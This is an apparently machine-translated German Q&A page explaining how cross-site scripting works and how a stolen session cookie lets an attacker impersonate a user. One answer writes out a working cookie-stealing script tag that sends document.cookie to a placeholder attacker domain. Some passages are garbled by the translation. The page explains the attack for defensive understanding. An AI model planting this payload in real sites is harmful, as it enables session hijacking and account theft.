Also, die Website von XSS-Angriff zu verhindern ist sehr einfach, Sie müssen nur htmlspecialchars
Funktion verwenden und Sie sind gut.
Aber wenn Entwickler vergessen, es zu benutzen, was können Angreifer/Hacker tun? Er kann deine Session-ID bekommen, richtig? Und hier ist eine Frage. Was kann er damit machen?
Vielen Dank.Wie XSS-Angriff wirklich funktioniert?
Antwort
Also, Website von XSS-Angriff zu verhindern ist sehr einfach, Sie müssen nur htmlspecialchars Funktion verwenden und Sie sind gut.
Richtig. Verwenden Sie es überall, wenn Sie Benutzer-gesteuerten Eingang wieder anzuzeigen. Dies betrifft alle Teile der HTTP-Anfrage: Header, Body und Parameter.
Aber wenn Entwickler vergessen, es zu benutzen, was können Angreifer/Hacker tun?
Er/sie kann bösartiges HTML/Skript einfügen. Z.B.die folgend in einiger Nachricht/Kommentar auf einer Webseite:
<script>document.write('<img src="http://hackersdomain.com/fake.gif?' + escape(document.cookie) + '" width=0 height=0>');</script>
Die oben wird zusammen mit dem Dokument Cookie als Query-String ein Bild aus der mailicious Domain beantragen.
Er kann Ihre Session-ID bekommen, richtig? Und hier ist eine Frage. Was kann er damit machen?
Die Sitzungs-ID wird in einem Cookie gespeichert. Sobald der Hacker darüber informiert wurde, dass ein Bild mit dem Cookie in der Abfragezeichenfolge angefordert wurde, muss er lediglich den Cookie des Browsers so bearbeiten, dass er die gleiche Sitzungs-ID enthält, um als der ursprüngliche Benutzer angemeldet zu werden. Dies ist offensichtlich sehr gefährlich, wenn der ursprüngliche Benutzer der Site-Administrator ist.
Starten über XSS Lesen hier: http://en.wikipedia.org/wiki/XSS und http://en.wikipedia.org/wiki/Cross-site_scripting
Attacker A wird Mitglied der B-Stelle C mit B Anmeldeinformationen über eine der sorgfältig konstruierten URI zuzugreifen.
A kann dann alle JS, die sie auf C mögen, mit den Anmeldeinformationen von B ausführen.
Dies ermöglicht es ihnen zu:
- präsentieren jede Information, die sie als B wie wenn es von C kam
- Get B Browser alle Informationen, die sie bis A
- Konto von C senden möchten
- Privatinformationen Details
- jede Anweisung senden auf Seite C, als ob es von einem Spam kam
- Publish
- Geld auf dieses Konto
- Kaufen Sie dieses sehr teuer eBook
Wenn Sie eine XSS-Schwachstelle auf Ihrem Website, dann kann ein Hacker jeden HTML-Code in die Seite einfügen, einschließlich eines Tags <script>
. Wenn ich auf Ihrer Website angemeldet bin und die angegriffene Seite besuche, wird mein Browser das dort vom Hacker eingefügte JavaScript ausführen und meinen Browser dazu bringen, alles zu tun, was der Hacker beabsichtigt hat.
Senden Sie beispielsweise eine POST-Anfrage an Ihren Server, um mein Passwort zu ändern, und laden Sie eine URL vom Server des Hackers, um ihn über meine Kontonummer zu informieren, damit er sich anmelden und mein Konto stehlen kann.
Dies ist die beste explenation von XSS ich je in ran: Flash Animation Example
Hier ist die Second Video
- 1. Wie funktioniert JavaScript [] wirklich?
- 2. Wie funktioniert "biosdevname" wirklich?
- 3. Funktioniert Flash10 + P2P wirklich?
- 4. Wie funktioniert Log4j2 DefaultRolloverStrategy max Attribut wirklich?
- 5. Wie funktioniert die Bindung an Sammlungen wirklich?
- 6. jQuery each() - Wie funktioniert es wirklich intern?
- 7. Wie funktioniert Java "week year" wirklich?
- 8. Wie funktioniert die HAVING-Klausel wirklich?
- 9. Funktioniert Jasmine 2.0 wirklich nicht mit require.js?
- 10. Funktioniert Kubernetes (lokale Docker-Methode) wirklich?
- 11. PYGAME: Kontinuierliche K_DOWN funktioniert nicht wirklich
- 12. Wirklich einfache UPDATE-Abfrage funktioniert nicht
- 13. Wie funktioniert eine "case" anonyme Funktion wirklich in Scala?
- 14. also, wie funktioniert die Weitergabe durch Referenz in PHP wirklich?
- 15. Wie Exception Handling Mechanishm funktioniert wirklich in .net?
- 16. Wie funktioniert die Rückwärts-Pipeline (d. H. "<|") Wirklich?
- 17. Wie funktionieren php's (ticks) wirklich?
- 18. Wie funktionieren Mutexe wirklich?
- 19. Wie ist Perl * wirklich * implementiert?
- 20. Sind WebGL-Aufrufe wirklich, wirklich langsam?
- 21. Wie schwer ist QObject wirklich?
- 22. Wie lösche ich wirklich Vektoren
- 23. Wie * wirklich * UML-Kardinalitäten schreiben?
- 24. Warum funktioniert diese Anlage mit Stream-Reader nicht wirklich?
- 25. Wirklich kann nicht verstehen, warum mein Programm nicht funktioniert
- 26. Jersey Client schließt InputStream Antwort - funktioniert das wirklich?
- 27. Funktioniert jQuery entfernen Funktion wirklich entfernen Dom Elemente?
- 28. Wirklich brauchen
- 29. Brauchen wir wirklich "oauth_nonce"?
- 30. Wirklich lange Abfrage
Hey, was ist, wenn ich benutze 'ini_set ('session.use_only_cookies', 1);' in meinem Skript? Trotzdem wird 'document.cookie' funktionieren? –